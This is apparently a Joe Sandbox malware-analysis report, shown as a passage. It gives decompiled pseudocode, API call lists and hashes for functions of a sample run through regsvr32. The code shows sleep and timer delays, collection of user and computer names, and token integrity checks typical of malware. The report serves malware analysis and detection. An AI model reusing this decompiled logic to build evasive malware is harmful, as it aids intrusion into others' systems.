Uniqueness Score: -1.00%

Function 007A1B47, Relevance: 16.6, APIs: 11, Instructions: 149
timememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E007A1B47(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x7aa298);
					_v20 = 0;
					_v16 = 0;
					L007A7F56();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x7aa2c4; // 0x2ec
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x7aa2a4 = 5;
						} else {
							_t69 = E007A4A3C(_t74); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x7aa2b8 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E007A243C( &_v20, _t73, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E007A7289(_t73, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x7aa29c);
							goto L21;
						} else {
							__eflags =  *0x7aa2a0; // 0xa
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E007A2813();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x7aa2a0);
								L21:
								L007A7F56();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x7aa290, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x007a1b47
0x007a1b59
0x007a1b5c
0x007a1b68
0x007a1b70
0x007a1b73
0x007a1cd9
0x007a1b79
0x007a1b79
0x007a1b7b
0x007a1b80
0x007a1b81
0x007a1b87
0x007a1b8a
0x007a1b8d
0x007a1b9b
0x007a1ba6
0x007a1ba9
0x007a1bab
0x007a1bb8
0x007a1bc2
0x007a1bc6
0x007a1bc9
0x007a1bce
0x007a1bd9
0x007a1bd9
0x007a1bd0
0x007a1bd0
0x007a1bd7
0x00000000
0x00000000
0x007a1bd7
0x007a1be3
0x00000000
0x007a1be6
0x007a1bea
0x007a1bf5
0x007a1bf5
0x007a1bfc
0x007a1c01
0x007a1c08
0x007a1c11
0x007a1c17
0x007a1c1a
0x007a1c21
0x007a1c24
0x00000000
0x00000000
0x007a1c26
0x007a1c29
0x007a1c2c
0x007a1c2f
0x00000000
0x007a1c31
0x007a1c40
0x007a1c40
0x00000000
0x007a1c6e
0x007a1c6e
0x007a1c73
0x007a1c92
0x007a1c94
0x007a1c99
0x007a1c9a
0x00000000
0x007a1c75
0x007a1c75
0x007a1c7b
0x00000000
0x007a1c7d
0x007a1c7d
0x007a1c82
0x007a1c84
0x007a1c89
0x007a1c8a
0x007a1ca0
0x007a1ca0
0x007a1ca8
0x007a1cb3
0x007a1cb6
0x007a1cc1
0x007a1cc3
0x007a1cc5
0x007a1cc8
0x00000000
0x007a1cce
0x00000000
0x007a1cce
0x007a1cc8
0x007a1c7b
0x00000000
0x007a1c73
0x007a1c43
0x007a1c45
0x007a1c48
0x007a1c49
0x007a1c49
0x007a1c4d
0x007a1c57
0x007a1c57
0x007a1c5d
0x007a1c60
0x007a1c60
0x007a1c66
0x007a1c66
0x007a1ce3
0x00000000

APIs

memset.NTDLL ref: 007A1B5C
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 007A1B68
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 007A1B8D
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 007A1BA9
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 007A1BC2
HeapFree.KERNEL32(00000000,00000000), ref: 007A1C57
CloseHandle.KERNEL32(?), ref: 007A1C66
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 007A1CA0
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,007A2F7D), ref: 007A1CB6
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 007A1CC1

Part of subcall function 007A4A3C: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05299338,00000000,?,73BCF710,00000000,73BCF730), ref: 007A4A8B
Part of subcall function 007A4A3C: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05299370,?,00000000,30314549,00000014,004F0053,0529932C), ref: 007A4B28
Part of subcall function 007A4A3C: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,007A1BD5), ref: 007A4B3A

GetLastError.KERNEL32 ref: 007A1CD3

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: 8f8e282b829d23f69debe0436b3896789f9e2ed50bbad54be3dae6632040b4dd
Instruction ID: d3a4a0d38199ef3165e39dd4087b841b102b4be502440ca1865f6715459f25ad
Opcode Fuzzy Hash: 8f8e282b829d23f69debe0436b3896789f9e2ed50bbad54be3dae6632040b4dd
Instruction Fuzzy Hash: C3515C71805229FEDF109F94DC44EEEBBB9EF86760F608216F514E2190D7798A50CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 007A2D63, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 191
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E007A2D63(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E007A5901();
				if(_t27 != 0) {
					_t77 =  *0x7aa2b4; // 0x4000000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0x7aa2b4 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0x7aa14c(0, 2);
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E007A4097( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0x7aa2d0; // 0x4aed5a8
					_push(0x7aa2d8);
					_push(1);
					_t7 = _t32 + 0x7ab5bc; // 0x4d283a53
					 *0x7aa2d4 = 0xc;
					 *0x7aa2dc = 0;
					L007A5EC2();
					_t36 = E007A57AD(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E007A3946(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E007A5C4E(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0x7aa2d0; // 0x4aed5a8
								_t18 = _t64 + 0x7ab916; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0x7aa328 = _t87;
						}
						_t38 = E007A2304();
						 *0x7aa2c8 =  *0x7aa2c8 ^ 0xe8fa7dd7;
						 *0x7aa318 = _t38;
						_t39 = E007A5C4E(0x60);
						__eflags = _t39;
						 *0x7aa37c = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0x7aa37c; // 0x5299630
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0x7aa37c; // 0x5299630
							 *_t56 = 0x7ab882;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0x7aa290, _t84, 0x52);
							__eflags = _t42;
							 *0x7aa310 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0x7aa2b4; // 0x4000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0x7aa2d0; // 0x4aed5a8
								_t19 = _t76 + 0x7ab212; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x7a92c7);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E007A3946( ~_v8 &  *0x7aa2c8, 0x7aa00c); // executed
								_t84 = E007A374B(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E007A3E8F(_t73); // executed
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E007A1B47(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E007A5D26(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0x7aa150();
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E007A63CD(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}

0x007a2d63
0x007a2d6e
0x007a2d71
0x007a2d74
0x007a2d77
0x007a2d7e
0x007a2d80
0x007a2d8c
0x007a2d8e
0x007a2d8e
0x007a2d97
0x007a2d9f
0x007a2da2
0x007a2dbc
0x007a2dc1
0x007a2dc2
0x007a2dc4
0x007a2dc9
0x007a2dce
0x007a2dd0
0x007a2dd7
0x007a2de1
0x007a2de7
0x007a2df4
0x007a2dfb
0x007a2e00
0x007a2e00
0x007a2e09
0x007a2e32
0x007a2e35
0x007a2e42
0x007a2e49
0x007a2e55
0x007a2e57
0x007a2e59
0x007a2e5e
0x007a2e64
0x007a2e6a
0x007a2e70
0x007a2e73
0x007a2e78
0x007a2e80
0x007a2e82
0x007a2e82
0x007a2e85
0x007a2e85
0x007a2e8b
0x007a2e90
0x007a2e98
0x007a2e9d
0x007a2ea2
0x007a2ea4
0x007a2ea9
0x007a2ed8
0x007a2eab
0x007a2eb0
0x007a2eb5
0x007a2eba
0x007a2ec1
0x007a2ec7
0x007a2ecc
0x007a2ed2
0x007a2ed2
0x007a2ed9
0x007a2edb
0x007a2eea
0x007a2ef0
0x007a2ef2
0x007a2ef7
0x007a2f23
0x007a2ef9
0x007a2ef9
0x007a2eff
0x007a2f0c
0x007a2f12
0x007a2f12
0x007a2f1a
0x007a2f1c
0x007a2f24
0x007a2f26
0x007a2f2d
0x007a2f3a
0x007a2f44
0x007a2f46
0x007a2f48
0x00000000
0x00000000
0x007a2f4a
0x007a2f4f
0x007a2f51
0x007a2f58
0x007a2f5c
0x007a2f5f
0x007a2f74
0x007a2f78
0x007a2f7d
0x00000000
0x007a2f7d
0x007a2f61
0x007a2f63
0x00000000
0x00000000
0x007a2f65
0x007a2f6e
0x007a2f70
0x007a2f72
0x00000000
0x00000000
0x00000000
0x007a2f72
0x007a2f55
0x007a2f55
0x007a2f26
0x007a2e0b
0x007a2e0b
0x007a2e10
0x007a2f7f
0x007a2f83
0x007a2f8b
0x007a2f8b
0x00000000
0x007a2f83
0x007a2e16
0x007a2e19
0x007a2e19
0x007a2e1b
0x007a2e1e
0x007a2e26
0x007a2e2d
0x00000000
0x007a2f93
0x007a2f93
0x007a2f96
0x007a2f9b
0x007a2f9b

APIs

Part of subcall function 007A5901: GetModuleHandleA.KERNEL32(4C44544E,00000000,007A2D7C,00000000,00000000,00000000,?,?,?,?,?,007A44F9,?,00000001), ref: 007A5910

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,007AA2D8,00000000), ref: 007A2DE7
CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,007A44F9,?,00000001), ref: 007A2E00
wsprintfA.USER32 ref: 007A2E80
memset.NTDLL ref: 007A2EB0
RtlInitializeCriticalSection.NTDLL(052995F0), ref: 007A2EC1
RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 007A2EEA
wsprintfA.USER32 ref: 007A2F1A

Part of subcall function 007A3946: GetUserNameW.ADVAPI32(00000000,?/z), ref: 007A397D
Part of subcall function 007A3946: RtlAllocateHeap.NTDLL(00000000,?/z), ref: 007A3994
Part of subcall function 007A3946: GetUserNameW.ADVAPI32(00000000,?/z), ref: 007A39A1
Part of subcall function 007A3946: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,007A2F3F,?,?,?,?,?,007A44F9,?,00000001), ref: 007A39C2
Part of subcall function 007A3946: GetComputerNameW.KERNEL32(00000000,00000000), ref: 007A39E9
Part of subcall function 007A3946: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 007A39FD
Part of subcall function 007A3946: GetComputerNameW.KERNEL32(00000000,00000000), ref: 007A3A0A
Part of subcall function 007A3946: HeapFree.KERNEL32(00000000,00000000), ref: 007A3A28

Part of subcall function 007A5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,007A3FAA), ref: 007A5C5A

Strings

~z, xrefs: 007A2F8B

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
String ID: ~z
API String ID: 2910951584-3848100038
Opcode ID: 7027ce607be581aae981971adc10c4e71db0e7b3ed07e9a73823ebd4ef1778b7
Instruction ID: d1432053722547887745989c6b0e02945b8b281d6b52214d0ea713be212c00c3
Opcode Fuzzy Hash: 7027ce607be581aae981971adc10c4e71db0e7b3ed07e9a73823ebd4ef1778b7
Instruction Fuzzy Hash: 5651D071900215EFDB21EBA8DC89BAE77B8ABC7710F104215F904E7292D77C9D42CB95

Uniqueness

Uniqueness Score: -1.00%

Function 007A57AD, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E007A57AD(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L007A7F50();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x7aa2d0; // 0x4aed5a8
				_t5 = _t13 + 0x7ab84d; // 0x5298df5
				_t6 = _t13 + 0x7ab580; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L007A7C2A();
				_t17 = CreateFileMappingW(0xffffffff, 0x7aa2d4, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x007a57ad
0x007a57b5
0x007a57b9
0x007a57bf
0x007a57c4
0x007a57c9
0x007a57cc
0x007a57cf
0x007a57d4
0x007a57d5
0x007a57d8
0x007a57dd
0x007a57e4
0x007a57ee
0x007a57f0
0x007a57f1
0x007a57f4
0x007a5810
0x007a5816
0x007a581a
0x007a5868
0x007a581c
0x007a5829
0x007a5839
0x007a5841
0x007a5853
0x007a5857
0x00000000
0x00000000
0x007a5843
0x007a5846
0x007a584b
0x007a584d
0x007a584d
0x007a582b
0x007a582d
0x007a5859
0x007a585a
0x007a585a
0x007a5829
0x007a586f

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,007A2DF9,?,00000001,?), ref: 007A57B9
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 007A57CF
_snwprintf.NTDLL ref: 007A57F4
CreateFileMappingW.KERNELBASE(000000FF,007AA2D4,00000004,00000000,00001000,?), ref: 007A5810
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,007A2DF9,?), ref: 007A5822
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 007A5839
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007A2DF9), ref: 007A585A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,007A2DF9,?), ref: 007A5862

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: d0676a75fde25a6172b3085799b8b90ea1b188d0779fd917b909e8d5bdd73ac8
Instruction ID: f58b2b55c3564a3739b827eef40c219ae2a2cfa0f721adf95cf61fbf361dcacb
Opcode Fuzzy Hash: d0676a75fde25a6172b3085799b8b90ea1b188d0779fd917b909e8d5bdd73ac8
Instruction Fuzzy Hash: 8B21D272A01204FBC7119B68CC05F9E77B9ABC6750F244224FB06EB1D0E77C9910DB64

Uniqueness

Uniqueness Score: -1.00%

Function 007A1041, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E007A1041(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x7aa2b4 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E007A5C4E(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E007A2A03(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x007a104e
0x007a1055
0x007a105c
0x007a1070
0x007a107b
0x007a1093
0x007a10a0
0x007a10a3
0x007a10a8
0x007a10b3
0x007a10b7
0x007a10c6
0x007a10ca
0x007a10e6
0x007a10e6
0x007a10ea
0x007a10ea
0x007a10ef
0x007a10f3
0x007a10f9
0x007a10fa
0x007a1101
0x007a1107

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 007A1073
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 007A1093
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 007A10A3
CloseHandle.KERNEL32(00000000), ref: 007A10F3

Part of subcall function 007A5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,007A3FAA), ref: 007A5C5A

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 007A10C6
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 007A10CE
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 007A10DE

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 703b52ce3f9b7fe66cf63fc1dbd45ef62aa1b5396609b66ceb7d1e68e8d5f4e3
Instruction ID: 299f2341b3d7881c84a4be12408b6ea53b2cb262c8277bea5d26f1f6fc3c84bc
Opcode Fuzzy Hash: 703b52ce3f9b7fe66cf63fc1dbd45ef62aa1b5396609b66ceb7d1e68e8d5f4e3
Instruction Fuzzy Hash: D321607590024EFFEB109F94CC84EEEBB79EB85300F004065F510A61A1D7794E44DB54

Uniqueness

Uniqueness Score: -1.00%

Function 007A4430, Relevance: 10.6, APIs: 7, Instructions: 72
sleepmemorytimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E007A4430(signed int __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				signed int _t33;
				signed int _t40;

				_t33 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0x7aa290 = _t14;
				if(_t14 != 0) {
					 *0x7aa180 = GetTickCount();
					_t16 = E007A2A18(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
						_push(0);
						_push(9);
						_push(_t29 >> 7);
						_push(_t20);
						L007A80B2();
						_t40 = _t18 + _t20;
						_t22 = E007A3F5D(_a4, _t40);
						_t23 = 2;
						Sleep(_t23 << _t40); // executed
					} while (_t22 == 1);
					_t25 =  *0x7aa2ac; // 0x2f0
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0x7aa2b8 = 1; // executed
						}
					}
					_t16 = E007A2D63(_t33); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}

0x007a4430
0x007a4445
0x007a444d
0x007a4452
0x007a4465
0x007a446a
0x007a4471
0x007a44f9
0x007a44ff
0x00000000
0x00000000
0x00000000
0x007a4477
0x007a4477
0x007a447c
0x007a4482
0x007a4488
0x007a4492
0x007a4496
0x007a4497
0x007a449c
0x007a449d
0x007a449e
0x007a44a3
0x007a44a9
0x007a44b2
0x007a44b8
0x007a44be
0x007a44c3
0x007a44ca
0x007a44ce
0x007a44d6
0x007a44de
0x007a44e0
0x007a44e0
0x007a44e8
0x007a44ea
0x007a44ea
0x007a44e8
0x007a44f4
0x00000000
0x007a44f4
0x007a4456
0x00000000

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 007A4445
GetTickCount.KERNEL32 ref: 007A445C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 007A447C
SwitchToThread.KERNEL32(?,00000001), ref: 007A4482
_aullrem.NTDLL(?,?,00000009,00000000), ref: 007A449E
Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 007A44B8
IsWow64Process.KERNEL32(000002F0,?,?,00000001), ref: 007A44D6

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
String ID:
API String ID: 3690864001-0
Opcode ID: 2b7ccdc907bdca024e16f8186eacd65f570054ab914dadd3b30daf0206b82a8c
Instruction ID: 7456053a12061b03e3399fe48ec4820f0cdd28a807e43687eb5615d7248c2ef9
Opcode Fuzzy Hash: 2b7ccdc907bdca024e16f8186eacd65f570054ab914dadd3b30daf0206b82a8c
Instruction Fuzzy Hash: 6B2105B2A00304AFC7109F64DC89B6B37E8B7CA350F10C629F605C2191E77D8814CB66

Uniqueness

Uniqueness Score: -1.00%

Function 007A5AE3, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E007A5AE3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x7aa2d0; // 0x4aed5a8
				_t1 = _t9 + 0x7ab61b; // 0x253d7325
				_t36 = 0;
				_t28 = E007A47BA(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x5299631
					_t40 = E007A5C4E(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
